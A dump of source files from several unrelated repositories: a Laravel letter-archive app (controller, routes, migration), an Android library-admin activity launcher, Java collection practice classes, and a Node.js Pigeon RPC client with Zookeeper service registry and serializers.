* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request)
{
// Server-side validation: every editable field is mandatory.
$rules = [
'no_surat' => ['required'],
'kepada' => ['required'],
'perihal' => ['required'],
'isi_surat' => ['required']
];
$this->validate($request, $rules);
// Persist only the whitelisted columns for the targeted letter.
$attributes = [
'no_surat' => $request->no_surat,
'kepada' => $request->kepada,
'perihal' => $request->perihal,
'isi_surat' => $request->isi_surat
];
Surat::where('id', $request->id)->update($attributes);
return redirect('surat_keluar');
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
// NOTE(review): intentionally a stub -- letters appear to be archived via
// the arsip endpoints rather than deleted; confirm before wiring a
// destructive route to this action.
//
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\Route;
// Unauthenticated landing pages.
Route::get('/', function () {
return view('auth/login');
});
Route::get('/profile', function () {
return view('profile');
});
// Everything below requires an authenticated session plus a matching role
// (enforced by the custom 'roles' middleware).
Route::group(['middleware' => ['web', 'auth', 'roles']],function(){
// Receptionist: incoming-letter intake and disposition handling.
Route::group(['roles'=>'Resepsionis'],function(){
Route::get('/disposisi', 'DisposisiController@resepsionis_list');
Route::get('/disposisi/edit/{id}','DisposisiController@edit');
Route::get('/disposisi/show/{id}','DisposisiController@show');
Route::post('/disposisi/update','DisposisiController@update');
Route::get('/create', 'DisposisiController@create');
Route::get('/resepsionis/surat_masuk', 'SuratController@masuk_resepsionis');
Route::get('/resepsionis/surat_keluar', 'SuratController@resepsionis_keluar');
Route::get('/resepsionis/arsip', 'SuratController@resepsionis_show');
Route::get('/resepsionis/arsip/cari', 'SuratController@resepsionis_cari');
Route::post('/disposisi/proses', 'DisposisiController@create_resepsionis');
});
// Head of administration (Sub. Bag. TU): user management and approvals.
Route::group(['roles'=>'Sub. Bag. TU'],function(){
Route::get('/home', 'HomeController@index')->name('home');
Route::get('/user', 'UserController@index');
Route::get('/user/delete/{id}', 'UserController@destroy');
Route::get('/user/tambah', 'UserController@tambah');
Route::post('/user/tambah/create', 'UserController@create');
Route::get('/disposisi2', 'DisposisiController@ketua_tu_list');
Route::get('/disposisi2/edit2/{id}','DisposisiController@edit2');
Route::get('/ketua_tu/surat_masuk', 'SuratController@masuk_ketua_tu');
Route::get('/ketua_tu/arsip', 'SuratController@ketua_tu_show');
Route::get('/ketua_tu/arsip/cari', 'SuratController@ketua_tu_cari');
Route::post('/disposisi2/update2','DisposisiController@update2');
});
// Routes shared by all authenticated roles (letter CRUD and archiving).
Route::get('/home_user', 'BrandaController@index');
Route::get('/surat_masuk/list', 'SuratController@show');
Route::get('/surat_masuk/cari', 'SuratController@cari');
Route::get('/surat_masuk', 'SuratController@index');
Route::get('/surat_keluar', 'SuratController@keluar');
Route::get('/surat_keluar/create', 'SuratController@create_form');
Route::get('/surat_keluar/edit/{id}', 'SuratController@edit');
Route::get('/surat_keluar/show/{id}', 'SuratController@lihat');
Route::post('/surat_keluar/update', 'SuratController@update');
Route::get('/surat_masuk/baca/{id}', 'SuratController@create');
Route::post('/surat_masuk/arsip', 'SuratController@store');
Route::post('/surat_keluar/arsip', 'SuratController@arsipkan');
Route::get('/surat_keluar/arsip/{id}', 'SuratController@tombol');
Route::get('/surat_keluar/arsip2/{id}', 'SuratController@tombol2');
Route::post('/surat_keluar/proses', 'SuratController@create_keluar');
});
// Laravel auth scaffolding (login/register/password routes).
Auth::routes();
// NOTE(review): '/home' is also registered inside the 'Sub. Bag. TU' group
// above; this later registration takes over for all users -- confirm that is
// intended before removing either one.
Route::get('/home', 'HomeController@index')->name('home');
<file_sep><?php
use Illuminate\Support\Facades\Schema;
use Illuminate\Database\Schema\Blueprint;
use Illuminate\Database\Migrations\Migration;
class Arsip extends Migration
{
    /**
     * Run the migrations.
     *
     * Creates the `arsip` table that stores archived copies of both incoming
     * and outgoing letters together with their disposition details.
     *
     * @return void
     */
    public function up()
    {
        Schema::create('arsip', function (Blueprint $table) {
            $table->bigIncrements('id');
            $table->enum('jenis_surat',['Surat Masuk','Surat Keluar']);
            $table->string('surat_dari');
            $table->date('tgl_surat');
            $table->date('tgl_terima');
            $table->string('no_surat');
            $table->unsignedBigInteger('no_agenda');
            $table->string('perihal');
            $table->string('aktor');
            $table->string('kepada');
            $table->string('isi_disposisi');
            $table->text('isi_surat');
            $table->string('diteruskan_kepada');
            $table->timestamps();
        });
    }
    /**
     * Reverse the migrations.
     *
     * Bug fix: down() was empty, so `php artisan migrate:rollback` could not
     * undo this migration; dropping the table restores the previous state.
     *
     * @return void
     */
    public function down()
    {
        Schema::dropIfExists('arsip');
    }
}
| 54dd2a2adc385315a52bfaa5615d96f92e7d8a91 | [
"PHP"
] | 9 | PHP | budi01010/SISMAK-Sistem-Informasi-Surat-Masuk-dan-Keluar- | e0a7f9f73de04770255bb374ced3934a1b3a7a90 | b976a23e6f3abf0f86469b5dc1ec763ff1b8918a |
refs/heads/master | <repo_name>muhtamim/PocketLibraryAdmin<file_sep>/app/src/main/java/leadinguniversity/pocketlibraryadmin/Util/ActivityLancher.java
package leadinguniversity.pocketlibraryadmin.Util;
import android.content.Context;
import android.content.Intent;
import leadinguniversity.pocketlibraryadmin.Ui.AddBookActivity;
import leadinguniversity.pocketlibraryadmin.Ui.BooksActivity;
import leadinguniversity.pocketlibraryadmin.Ui.EditBookActivity;
import leadinguniversity.pocketlibraryadmin.Ui.EditProfileActivity;
import leadinguniversity.pocketlibraryadmin.Ui.EditPublisherActivity;
import leadinguniversity.pocketlibraryadmin.Ui.LoginActivity;
import leadinguniversity.pocketlibraryadmin.Ui.PDFViewerActivity;
import leadinguniversity.pocketlibraryadmin.Ui.RegisterActivity;
import leadinguniversity.pocketlibraryadmin.data.Book;
import leadinguniversity.pocketlibraryadmin.data.Publisher;
public final class ActivityLancher {
public static final String BOOK_KEY = "book";
public static final String publisher_KEY = "publisher";
public static void openLoginActivity(Context context) {
context.startActivity(new Intent(context, LoginActivity.class));
}
public static void openBooksActivity(Context context) {
context.startActivity(new Intent(context, BooksActivity.class));
}
public static void openRegisterActivity(Context context) {
context.startActivity(new Intent(context, RegisterActivity.class));
}
public static void openAddBookActivity(Context context){
Intent i = new Intent(context, AddBookActivity.class);
context.startActivity(i);
}
public static void openEditBookActivity(Context context, Book book){
Intent i = new Intent(context, EditBookActivity.class);
i.putExtra(BOOK_KEY, book);
context.startActivity(i);
}
public static void openEditpublisherFragment(Context context, Publisher publisher){
Intent i = new Intent(context, EditPublisherActivity.class);
i.putExtra("publisher_KEY", publisher);
context.startActivity(i);
}
public static void openEditPublisherActivity(Context context, Publisher publisher){
Intent i = new Intent(context, EditProfileActivity.class);
i.putExtra("publisher_KEY", publisher);
context.startActivity(i);
}
public static void openPDFViewerActivity(Context context, Book book){
Intent i = new Intent(context, PDFViewerActivity.class);
i.putExtra(BOOK_KEY, book);
context.startActivity(i);
}
}
| 14ccab4379110a37b54190fee8aeb4b55dc4c165 | [
"Java"
] | 1 | Java | muhtamim/PocketLibraryAdmin | b53026ab9514f2c317301ce5ac0e7a3fbbca235f | fb5ec7844015120f9e4c5216991fe402e79dddd9 |
refs/heads/master | <repo_name>NivethaRS16/JavaBasics<file_sep>/VectorClass.java
package com.java.Test;
import java.util.Vector;
public class VectorClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
Vector vec = new Vector(7);
// use add() method to add elements in the vector
vec.add(1);
vec.add(2);
vec.add(3);
vec.add(4);
vec.add(5);
vec.add(6);
vec.add(7);
vec.add(8);
// checking capacity
System.out.println("Size of vector: " + vec.size());
System.out.println("Capacity of vector: " + vec.capacity());
}
}
<file_sep>/SynchronizedCollection.java
package com.java.Test;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
public class SynchronizedCollection {
public static void main(String[] args) {
// TODO Auto-generated method stub
//Method 1
List<Integer> list = Collections.synchronizedList(new ArrayList<Integer>());
list.add(1);
list.add(2);
list.add(3);
synchronized(list)
{
list.forEach(x -> System.out.println("List val is "+x));
}
//Method 2
CopyOnWriteArrayList<String> a = new CopyOnWriteArrayList<String>();
a.add("A");
a.add("B");
a.add("C");
for(String str:a)
{
System.out.println("List is = "+str);
}
}
}<file_sep>/ImmutableListClass.java
package com.java.Test;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import com.google.common.collect.ImmutableList;
public class ImmutableListClass {
static <T> void createList(List<T> list)
{
ImmutableList<T> l = ImmutableList.copyOf(list);
System.out.println(l);
}
public static void main(String[] args) {
// TODO Auto-generated method stub
//Create immutable list - Method1
ImmutableList<String> list = ImmutableList.of("Geeks", "For", "Geeks");
//System.out.println(list);
//list.add("Add");
System.out.println(list);
//Create immutable list - Method 2
List<String> l1 = new ArrayList<String>(Arrays.asList("Geeks", "For", "Geeks"));
createList(l1);
List<Integer> l11 = new ArrayList<Integer>(Arrays.asList(1,2,3));
createList(l11);
//Create immutable list - Method 3
List<String> a = List.of();
//a.add(0, "Test");
System.out.println(a);
//Create immutable list - Method 4
ImmutableList<String> list1 = ImmutableList.<String>builder().add("Immutable").build();
//list1.add("test");
System.out.println(list1);
//Create immutable list - Method 5
List<String> l2 = List.of("Test","immutable");
ImmutableList<String> list2 = ImmutableList.<String>builder().addAll(l2).add("list").build();
//list2.add("test");
System.out.println(list2);
//Create list add to immutable list created by unmodifiableList then add elements to list - possible
List<Integer> l12 = new ArrayList<Integer>(Arrays.asList(1,2,3));
List<Integer> list11 = Collections.unmodifiableList(l12);
l12.add(10);
System.out.println(list11);
//Create list add to immutable list then add elements to list - not possible - error
List<String> l22 = List.of("Test","immutable");
ImmutableList<String> list12 = ImmutableList.copyOf(l22);
l22.add("test");
System.out.println(l2);
}
}
<file_sep>/EnumInterface.java
package com.java.Test;
public enum EnumInterface implements MyInterface {
SUM {
@Override
public String asLowercase() {
return SUM.toString().toLowerCase();
}
},
SUBTRACT {
@Override
public String asLowercase() {
return SUBTRACT.toString().toLowerCase();
}
};
}<file_sep>/Reverse.java
package com.java.Test;
public class Reverse {
static int reverse(int a)
{
int rev = 0;
//System.out.println(a);
while(a !=0)
{
rev = rev * 10;
rev = rev + a % 10;
a = a/10;
}
return rev;
}
public static void main(String[] args) {
//Reverse r = new Reverse();
System.out.println("Reverse is "+reverse(1234));
}
}
<file_sep>/MyInterface.java
package com.java.Test;
public interface MyInterface {
String asLowercase();
}
<file_sep>/LinkedListClass.java
package com.java.Test;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.ListIterator;
public class LinkedListClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
//Create a linked list
LinkedList<String> l1 = new LinkedList<String>();
l1.add("Vijaya");
l1.add("Nivi");
l1.add("Harshi");
l1.addFirst("Senthil");
l1.addLast("Vignesh");
//iterate through using ListIterator both forward and backward
ListIterator it = l1.listIterator();
while(it.hasNext())
{
System.out.println("Linked list "+it.next());
}
/*
while(it.hasPrevious())
{
System.out.println("Reverse order "+it.previous());
}
//Sorted
Collections.sort(l1);
System.out.println("Sorted "+l1);
//Reverse Sort - Method 1
Collections.sort(l1,Collections.reverseOrder());
System.out.println("Reverse Sorted "+l1);
//Reverse Sort - Method 2
Iterator t1 = l1.descendingIterator();
while(t1.hasNext())
{
System.out.println("Reverse sorted list "+t1.next());
}
//LinkedList to Array
String[] array = l1.toArray(new String[l1.size()]);
for (int i = 0; i < array.length; i++)
{
System.out.println(array[i]);
}
//LinkedList to ArrayList
ArrayList<String> a1 = new ArrayList<String>(l1);
for(String str: l1)
{
System.out.println(str);
}
*/
l1.push("Pushing new");
System.out.println("After push "+l1);
l1.pop();
System.out.println("After pop "+l1);
System.out.println("After push "+l1);
Object o = l1.peek();
System.out.println(" peep value "+o);
System.out.println("After push "+l1);
Object o1 = l1.peekLast();
System.out.println(" peep last value "+o1);
System.out.println("After push "+l1);
Object o2 = l1.poll();
System.out.println(" poll value "+o2);
System.out.println("After push "+l1);
Object o3 = l1.pollLast();
System.out.println(" poll value "+o3);
System.out.println("After push "+l1);
Enumeration e1 = Collections.enumeration(l1);
while(e1.hasMoreElements())
{
System.out.println("List "+e1.nextElement());
}
}
}
<file_sep>/Factorial.java
package com.java.Test;
public class Factorial {
static int fact(int num)
{
int output;
if ( num == 1 )
return 1;
else
output = num * fact(num - 1);
return output;
}
public static void main(String[] args) {
System.out.println("factorial is "+fact(15));
}
}
<file_sep>/HashMapClass.java
package com.java.Test;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import java.util.TreeMap;
public class HashMapClass {
public static <E> void main(String[] args) {
// TODO Auto-generated method stub
HashMap<Integer,String> hmap = new HashMap<Integer,String>();
hmap.put(1, "A");
hmap.put(5, "B");
hmap.put(16, "C");
hmap.put(2, "D");
hmap.put(11, "E");
System.out.println(hmap);
//Iterate HashMap
Set s1 = hmap.entrySet();
Iterator i1 = s1.iterator();
while(i1.hasNext())
{
Map.Entry m1 = (Map.Entry) i1.next();
System.out.print("Key is: "+m1.getKey() + " & Value is: "+m1.getValue()+"\n");
}
Map<Integer,String> hmap1 = new TreeMap<Integer,String>(hmap);
Set s2 = hmap1.entrySet();
Iterator i2 = s2.iterator();
while(i2.hasNext())
{
Map.Entry m2 = (Map.Entry) i2.next();
System.out.print("Key is: "+m2.getKey() + " & Value is: "+m2.getValue()+"\n");
}
//Empty hashmap
hmap.clear();
System.out.println(hmap);
//FInd if empty or not
boolean b = hmap.isEmpty();
System.out.println("Empty val "+b);
//Sort hashMap
}
}
<file_sep>/SerializeClass.java
package com.java.Test;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Set;
public class SerializeClass {
static void InputSerialise(HashMap<Integer,String> hmap)
{
try {
FileOutputStream fos = new FileOutputStream("out.ser");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(hmap);
oos.close();
fos.close();
System.out.println("serialised data stored");
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
static void OuputSerialse(String s1)
{
HashMap<Integer, String> map = null;
FileInputStream fis;
try {
fis = new FileInputStream("out.ser");
ObjectInputStream ois = new ObjectInputStream(fis);
map = (HashMap<Integer, String>) ois.readObject();
ois.close();
fis.close();
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (ClassNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
Set set = map.entrySet();
Iterator iterator = set.iterator();
while(iterator.hasNext())
{
Map.Entry mentry = (Map.Entry)iterator.next();
System.out.print("key: "+ mentry.getKey() + " & Value: ");
System.out.println(mentry.getValue());
}
}
public static void main(String[] args) {
// TODO Auto-generated method stub
HashMap<Integer,String> hmap = new HashMap<Integer,String>();
hmap.put(1, "A");
hmap.put(5, "B");
hmap.put(16, "C");
hmap.put(2, "D");
hmap.put(11, "E");
System.out.println(hmap);
InputSerialise(hmap);
OuputSerialse("out.ser");
}
}
| c2d78d3e7a1d6fca543a78eac4f0327bf0415ccd | [
"Java"
] | 10 | Java | NivethaRS16/JavaBasics | f3e8b15036dda6bb23147c373e159ff651f92723 | 85f596e5de73e8b64c7cdfd2f2be16a7aec898a6 |
refs/heads/master | <file_sep>'use strict';
require('rootpath');
/*
*
* Constants.
*
*/
var SERIALIZE_ID = 7
, URL_FIELD = 'url'
, RESULT_FIELD = 'response'
;
function serialize(body) {
return body;
}
function deserialize(body) {
return body;
}
module.exports = {
SERIALIZE_ID: SERIALIZE_ID,
URL_FIELD : URL_FIELD,
RESULT_FIELD: RESULT_FIELD,
serialize : serialize,
deserialize : deserialize
};
<file_sep>'use strict';
/**
* Registry.
* This module is designed to subscribe Pigeon servers and server weights from
* the registry for remote service call.
*
* Module dependencies:
* Index ---> Registry
* Registry ---> Registry
*/
require('rootpath')();
var _ = require('underscore')
, async = require('async')
, zookeeper = require('node-zookeeper-client')
, Error = require('lib/error')
, logger = require('lib/logger')('registry')
, tcpRegistry = require('lib/registry/tcp')
, httpRegistry = require('lib/registry/http')
;
/*
*
* Constants.
*
*/
var SESSION_TIMEOUT = 30 * 1000
, SPIN_DELAY = 1000
, RETRIES = 1000
, CONNECT_TIMEOUT = 5 * 1000
;
var PLACEHOLDER = '^'
, PATH_SEPARATOR = '/'
, SERVER_PATH = '/DP/SERVER'
, WEIGHT_PATH = '/DP/WEIGHT'
;
/*
*
* Globals.
*
*/
var g_zk = {}
, g_init = false
;
/**
 * Per-service registry client.
 * Wraps the shared Zookeeper connection and resolves which protocol-specific
 * registry module (tcp/http) formats this service's node names.
 *
 * @param {Object} service service descriptor (carries url, configs, router).
 */
function Registry(service) {
this.service = service;
this.registry = whichRegistry(this.service.configs);
}
/**
 * Open the (module-global) Zookeeper connection; invoke `done` once the
 * 'connected' event fires, or with an error after CONNECT_TIMEOUT ms.
 * On session expiry the client is closed and startup() re-entered.
 */
Registry.prototype.startup = function startup(done) {
g_zk = zookeeper.createClient(this.service.configs.get('zkserver'), {
sessionTimeout: SESSION_TIMEOUT,
spinDelay: SPIN_DELAY,
retries: RETRIES
});
var that = this;
g_zk.on('connected', function() {
logger.info('Zookeeper connection: state(connected).');
g_init = true;
// NOTE(review): 'connected' can also fire on reconnects, so `done` may run
// more than once -- confirm callers tolerate that.
done && done();
});
g_zk.on('expired', function() {
logger.warn('Zookeeper connection: state(expired).');
g_zk.close();
that.startup();
});
// Remaining states are only logged, not acted upon.
[
'connectedReadOnly',
'disconnected',
'authenticationFailed'
].forEach(function(state) {
g_zk.on(state, function() {
logger.warn('Zookeeper connection: state(%s).', state);
});
});
logger.info('Zookeeper connection: connecting...');
g_zk.connect();
// Fail fast if the 'connected' event never arrives.
setTimeout(function() {
if (!g_init) {
var err = new Error('zookeeper',
'Zookeeper connection: error(%s)', 'connection timeout');
done(err);
g_zk.close();
}
}, CONNECT_TIMEOUT);
};
/**
 * Subscribe to server-list (and, transitively, weight) changes for this
 * service; `done` fires after the initial subscription completes.
 */
Registry.prototype.subscribe = function subscribe(done) {
logger.info('Zookeeper subscription: start subscripton, service(%s).',
this.service.url);
servers(this, done);
};
/**
 * Watch /DP/SERVER/<escaped service url> and keep the service's server list
 * fresh. The node's data is a comma-separated ip:port list; NODE_DATA_CHANGED
 * triggers a re-subscription, NODE_DELETED clears the router status table.
 */
function servers(context, done) {
logger.info('Zookeeper server subscription: start server subscription, ' +
'service(%s).', context.service.url);
var path = serverPath(context, context.service.url);
logger.debug('Zookeeper server subscription: node(%s), service(%s).',
path, context.service.url);
g_zk.exists(
path,
function(event) {
logger.debug('Zookeeper server subscription(*): event(%s), node(%s), service(%s)',
event.getName(), path, context.service.url);
},
function(err, stat) {
if (err) {
return done(new Error('zookeeper', 'Zookeeper server subscription: ' +
'error(%s), node(%s), service(%s).', err, path, context.service.url));
}
// A missing server node means the service is not registered at all.
if (!stat) {
return done(new Error('zookeeper', 'Zookeeper server subscritpion: ' +
'error(%s), node(%s), service(%s).', 'node not found', path, context.service.url));
}
g_zk.getData(
path,
function(event) {
var name = event.getName();
switch(name) {
case 'NODE_DELETED':
logger.info('Zookeeper server subscription: event(%s), ' +
'node(%s), service(%s).', name, path, context.service.url);
context.service.router.status = {};
break;
case 'NODE_DATA_CHANGED':
logger.info('Zookeeper server subscription: event(%s), ' +
'node(%s), service(%s).', name, path, context.service.url);
// Re-read the list; errors here are only logged since nobody waits.
servers(context, function(err) {
if (err) {
logger.error(err);
}
});
break;
default:
logger.debug('Zookeeper server subscription(*): event(%s), node(%s), ' +
'service(%s).', name, path, context.service.url);
}
},
function(err, data, stat) {
if (err) {
return done(new Error('zookeeper', 'Zookeeper server subscription: error(%s): ' +
'node(%s), service(%s).', err, path, context.service.url));
}
if (!stat) {
return done(new Error('zookeeper', 'Zookeeper error(%s): ' +
'node(%s), service(%s).', 'node not found', path, context.service.url));
}
// Empty node data yields an empty server list, not an error.
var ips = (data && data.toString()) ? data.toString().split(',') : [];
logger.info('Zookeeper server subscription: data(%j), node(%s).', ips, path);
weights(context, ips, done);
}
)
}
);
}
/**
 * Reconcile the router's server table with the fresh ip list: drop vanished
 * servers, seed new ones with neutral 0.5 weights, then subscribe each new
 * server's weight node in parallel.
 *
 * Bug fix: the second debug log passed (newips, url) against the format
 * 'service(%s), new servers(%s)', printing the values swapped; the argument
 * order now matches the format string.
 */
function weights(context, ips, done) {
logger.debug('Zookeeper weights subscription: all servers(%s), service(%s).',
ips, context.service.url);
var oldips = _.keys(context.service.router.status);
// Servers that disappeared from the registry are removed outright.
_.difference(oldips, ips).forEach(function(ip) {
delete context.service.router.status[ip];
});
var newips = _.difference(ips, oldips);
// Newly seen servers start with neutral load-balance/reachability scores.
newips.forEach(function(ip) {
context.service.router.status[ip] = {
loadBalance : 0.5,
reachability: 0.5
};
});
logger.debug('Zookeeper weights subscription: service(%s), new servers(%s).',
context.service.url, newips);
async.each(
newips,
function(ip, eachdone) {
weight(context, ip, eachdone);
},
function(err) {
done(err);
}
);
}
/**
 * Watch /DP/WEIGHT/<ip> and keep that server's load-balance weight current.
 * A missing weight node is not an error (the seeded 0.5 default stands);
 * NODE_CREATED / NODE_DATA_CHANGED events trigger a re-subscription.
 */
function weight(context, ip, eachdone) {
logger.info('Zookeeper weight subscription: start weight subscription, ' +
'server(%s), service(%s).', ip, context.service.url);
var path = weightPath(ip);
logger.debug('Zookeeper weight subscription: node(%s), server(%s), service(%s).',
path, ip, context.service.url);
g_zk.exists(
path,
function(event) {
var name = event.getName();
switch(name) {
case 'NODE_CREATED':
logger.info('Zookeeper weight subscription: event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
weight(context, ip, function(err) {
if (err) {
logger.error(err);
}
});
break;
default:
logger.debug('Zookeeper weight subscription(*): event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
}
},
function(err, stat) {
if (err) {
return eachdone(new Error('zookeeper', 'Zookeeper weight ' +
'subscription: error(%s), node(%s), server(%s), service(%s).',
err, path, ip, context.service.url));
}
// No weight node yet: keep the default weight and wait for NODE_CREATED.
if (!stat) {
return eachdone();
}
g_zk.getData(
path,
function(event) {
var name = event.getName();
switch(name) {
case 'NODE_DATA_CHANGED':
logger.info('Zookeeper weight subscription: event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
weight(context, ip, function(err) {
if (err) {
logger.error(err);
}
});
break;
default:
logger.debug('Zookeeper weight subscription(*): event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
}
},
function(err, data, stat) {
if (err) {
return eachdone(new Error('zookeeper', 'Zookeeper weight ' +
'subscription: error(%s), node(%s), server(%s), service(%s).',
err, path, ip, context.service.url));
}
if (!stat) {
return eachdone(new Error('zookeeper', 'Zookeeper weight ' +
'subscription: error(%s), node(%s), server(%s), service(%s).',
'node not found', path, ip, context.service.url));
}
// NOTE(review): this local `weight` shadows the enclosing function name;
// empty node data falls back to the neutral 0.5 weight.
var weight = (data && data.toString()) ? parseInt(data.toString()) : 0.5;
logger.info('Zookeeper weight subscription: data(%j), node(%s), ' +
'server(%s), service(%s).', weight, path, ip, context.service.url);
// The server may have been removed meanwhile; only update if still known.
if (context.service.router.status[ip]) {
context.service.router.status[ip].loadBalance = weight;
}
eachdone();
}
);
}
);
}
/** Zookeeper node holding the server list for a service url. */
function serverPath(context, url) {
  var node = context.registry.PROTOCOL_PREFIX + url;
  return SERVER_PATH + PATH_SEPARATOR + escape(node);
}
/** Zookeeper node holding the weight of a single server. */
function weightPath(ip) {
  return WEIGHT_PATH + PATH_SEPARATOR + ip;
}
/** Replace every path separator so the url becomes a single node name. */
function escape(str) {
  return str.split(PATH_SEPARATOR).join(PLACEHOLDER);
}
/** Map the configured protocol onto its registry implementation. */
function whichRegistry(configs) {
  var protocol = configs.get('protocol');
  if (protocol === 'tcp') {
    return tcpRegistry;
  }
  if (protocol === 'http') {
    return httpRegistry;
  }
  logger.fatal('Unsupported protocol: %j.', protocol);
}
module.exports = Registry;
<file_sep>var winston = require('winston')
, util = require('util')
;
/*
*
* Constants.
*
*/
// Prefix prepended to every log line so pigeon output is identifiable.
var packagename = 'node-pigeon';
winston.cli();
// Single shared console transport: 'info' level, colorized, exceptions
// handled by winston, and errors do not terminate the process.
var logger = new (winston.Logger)({
transports: [
new (winston.transports.Console)({
level : 'info',
handleException: true,
json : false,
colorize : true
})
],
exitOnError: false
});
logger.cli();
module.exports = function createLogger(modulename) {
modulename = '[' + modulename + ']';
return {
debug: function() {
logger.debug(packagename, modulename,
util.format.apply(util, arguments));
},
info: function() {
logger.info(packagename, modulename,
util.format.apply(util, arguments));
},
warn: function() {
logger.warn(packagename, modulename,
util.format.apply(util, arguments));
},
error: function() {
logger.error(packagename, modulename,
util.format.apply(this, arguments));
},
fatal: function() {
logger.error(packagename, modulename,
util.format.apply(this, arguments),
function() {
process.exit(1);
}
);
}
};
};
<file_sep>'use strict';
require('rootpath');
var _ = require('underscore');
/*
*
* Constants.
*
*/
/**
 * Java types treated as leaves when validating a $class-annotated object
 * tree; anything else is recursed into via its `$` field map.
 */
var PRIMITIVES = [
'int',
'long',
'double',
'boolean',
'java.lang.Integer',
'java.lang.Long',
'java.lang.Double',
'java.lang.Boolean',
'java.lang.String',
'java.util.Date'
];
/**
 * Depth-first scan of a wrapped java object; returns the first `$err`
 * recorded anywhere in the tree, or null when the tree is clean.
 */
function check(javaObject) {
if (javaObject['$err']) {
return javaObject['$err'];
}
if (_.contains(PRIMITIVES, javaObject['$class'])) {
return null;
}
var err = null;
_.each(javaObject['$'], function(field) {
var fielderr = check(field);
// Keep only the first error encountered; later ones are discarded.
if (fielderr && !err) {
err = fielderr;
}
});
return err;
}
/**
 * Like check(), but returns `true` for a valid tree and the offending
 * `$err` value otherwise (short-circuits on the first failure).
 */
function isJava(javaObject) {
if (javaObject['$err']) {
return javaObject['$err'];
}
if (_.contains(PRIMITIVES, javaObject['$class'])) {
return true;
}
var err;
var result = _.every(javaObject['$'], function(i) {
var result = isJava(i);
if (result === true) {
return true;
} else {
err = result;
return false;
}
});
if (result === true) {
return true;
} else {
return err;
}
}
/**
* int.
* MIN_INT <= int < MAX_INT
*/
var MAX_INT = +Math.pow(2, 31)
, MIN_INT = -Math.pow(2, 31)
;
function isint(jsObject) {
return _.isNumber(jsObject) && jsObject % 1 === 0
&& jsObject >= MIN_INT && jsObject < MAX_INT;
}
/**
* long.
* MIN_LONG <= long < MAX_LONG
*/
var MAX_LONG = +Math.pow(2, 63)
, MIN_LONG = -Math.pow(2, 63)
;
function islong(jsObject) {
return _.isNumber(jsObject) && jsObject % 1 === 0
&& jsObject >= MIN_LONG && jsObject < MAX_LONG;
}
/**
* double.
*/
function isdouble(jsObject) {
return _.isNumber(jsObject)
}
/**
* boolean.
*/
function isboolean(jsObject) {
return _.isBoolean(jsObject);
}
/**
* java.lang.Integer.
*/
function isInteger(jsObject) {
return isint(jsObject);
}
/**
* java.lang.Long.
*/
function isLong(jsObject) {
return islong(jsObject);
}
/**
* java.lang.Double.
*/
function isDouble(jsObject) {
return isdouble(jsObject);
}
/**
* java.lang.Boolean.
*/
function isBoolean(jsObject) {
return isboolean(jsObject);
}
/**
* java.lang.String.
*/
function isString(jsObject) {
return _.isString(jsObject);
}
/**
* java.lang.Object.
*/
function isObject(jsObject) {
return _.isObject(jsObject) && !_.isArray(jsObject) && !_.isFunction(jsObject);
}
/**
* user defined.
*/
function isClass(jsObject) {
return isObject(jsObject);
}
/**
* java.util.Date.
*/
function isDate(jsObject) {
return _.isDate(jsObject);
}
/**
* array.
*/
function isarray(jsObject) {
return _.isArray(jsObject);
}
/**
* java.util.List.
*/
function isList(jsObject) {
return _.isArray(jsObject);
}
/**
* java.util.Map.
*/
function isMap(jsObject) {
return isObject(jsObject);
}
module.exports = {
check : check,
isint : isint,
islong : islong,
isdouble : isdouble,
isboolean: isboolean,
isInteger: isInteger,
isLong : isLong,
isDouble : isDouble,
isBoolean: isBoolean,
isString : isString,
isObject : isObject,
isClass : isClass,
isDate : isDate,
isarray : isarray,
isList : isList,
isMap : isMap
};<file_sep>'use strict';
require('rootpath')();
var logger = require('lib/logger')('serializer')
, hessian = require('lib/serializer/hessian')
, json = require('lib/serializer/json')
, protobuf = require('lib/serializer/protobuf')
;
/**
 * Protocol-agnostic serializer facade for a service.
 * Picks the concrete implementation (hessian/json/protobuf) from the
 * service's `serialize` config and mirrors its wire-protocol constants.
 *
 * Cleanup: serialize()/deserialize() previously wrapped the delegate call in
 * `try { ... } catch (err) { throw err; }`, a no-op -- errors still propagate
 * to the caller unchanged.
 *
 * @param {Object} service service descriptor carrying `configs`.
 */
function Serializer(service) {
  this.service = service;
  this.serializer = whichSerializer(service.configs);
  this.SERIALIZE_ID = this.serializer.SERIALIZE_ID;
  this.URL_FIELD = this.serializer.URL_FIELD;
  this.RESULT_FIELD = this.serializer.RESULT_FIELD;
}
/** Encode a request body with the configured serializer. May throw. */
Serializer.prototype.serialize = function serialize(body) {
  return this.serializer.serialize(body);
};
